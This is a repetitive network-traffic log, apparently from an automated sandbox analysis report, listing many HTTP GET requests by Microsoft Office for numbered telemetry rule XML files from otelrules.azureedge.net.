Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
